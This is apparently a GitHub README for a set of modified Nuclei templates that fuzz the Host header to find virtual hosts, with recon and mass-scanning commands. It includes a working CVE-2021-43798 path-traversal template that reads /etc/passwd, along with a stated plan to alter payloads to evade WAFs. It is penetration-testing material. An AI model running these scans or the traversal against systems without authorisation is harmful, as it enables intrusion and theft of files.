Skip to content

Modified Nuclei Templates Version to FUZZ Host Header

Notifications You must be signed in to change notification settings

0xAwali/Virtual-Host

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

66 Commits
 
 
 
 

Repository files navigation

Modified Nuclei Templates Version to FUZZ Host Header

Requirements

1 - Understand Virtual Host

Virtual Host refers to run more than one web site on a single IP

e.g. You can configure Nginx to run two web site e.g. dev.example.com and api.example.com like that
server {
        listen 80;
        listen [::]:80;

        root /var/www/dev/html;
        index index.html;

        server_name dev.example.com;

        location / {
                try_files $uri $uri/ =404;
        }
}
server {
        listen 443 ssl;
        listen [::]:443 ssl;
        
        ssl on;
        ssl_certificate /path/your.crt;
        ssl_trusted_certificate /path/your.crt;
        ssl_certificate_key /path/your.key;
        
        root /var/www/api/html;
        index index.html;

        server_name api.example.com;

        location / {
                try_files $uri $uri/ =404;
        }
}

2 - Install

dnsx

httpx

Nuclei

anew

3 - Clone this Repository

Virtual Host

Usage

cat subdomains.txt | dnsx -a -silent -retry 5 -resp -o scanning.txt
cat scanning.txt | tr -d '[]' | awk '{ print $2 }' | sort -u | tee -a ips.txt
cat ips.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o aliveIPS.txt
cat scanning.txt | awk '{ print $1 }' | sort -u | tee -a resolvableDomains.txt
cat resolvableDomains.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o websites.txt
cat websites.txt | sed 's|^https://||' | sed 's|^http://||' | tee aliveSUBDOMAINS.txt
cat resolvableDomains.txt | anew aliveSUBDOMAINS.txt -d | tee -a deadSUBDOMAINS.txt
sed -i -- 's|/home/mahmoud/Wordlist/AllSubdomains.txt|/path/deadSUBDOMAINS.txt|' *.yaml
nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/CVE/" -severity high -o bugs.txt

Keep in Your Mind

If You gonna Use SSRF Templates , You must Use Your DOMAIN e.g.

nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/SSRF/*.yaml" -var "MY-DOMAIN=me.com"

To Minimize Number of ERRORS , Prefer Using FOR LOOP e.g.

for ip in `cat aliveIPS.txt`
do
 nuclei -u $ip -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/" -severity high -o bugs.txt
done

Tips

if U are Nuclei's Templates Contributer , write Your Templates by using HTTP raw format to MAKE THIS REPOSITORY UPDATE e.g.

id:

info:
  name:
  author:
  severity:

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 

      - type: word
        words:
          - ""
          - ""
        condition: and

      - type: word
        part: header
        words:
          - ""

Planning

I'm Trying to modify Nuclei's Templates to become MORE Powerful e.g. CVE-2021-43798

id: CVE-2021-43798

info:
  name:
  author:
  severity:


requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

I'm gonna Replace ../../../../../../../../../../../../../../../../../../../etc/passwd to {{FILE-unix}}

id: CVE-2021-43798

info:
  name: 
  author: 
  severity:


requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/{{FILE-unix}}"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

that will help to bypass WAFs by using Custom paylaods because I think all WAFs detect ../../etc/passwd so using ../../etc/passwd is gonna be useless but using Custom paylaods is gonna be useful

Help ME !

these days I'm trying to find junior web penetration testing position but it's must be Remotely Becuase I'm still Student so IF YOU CAN HELP ME , DM on TWITTER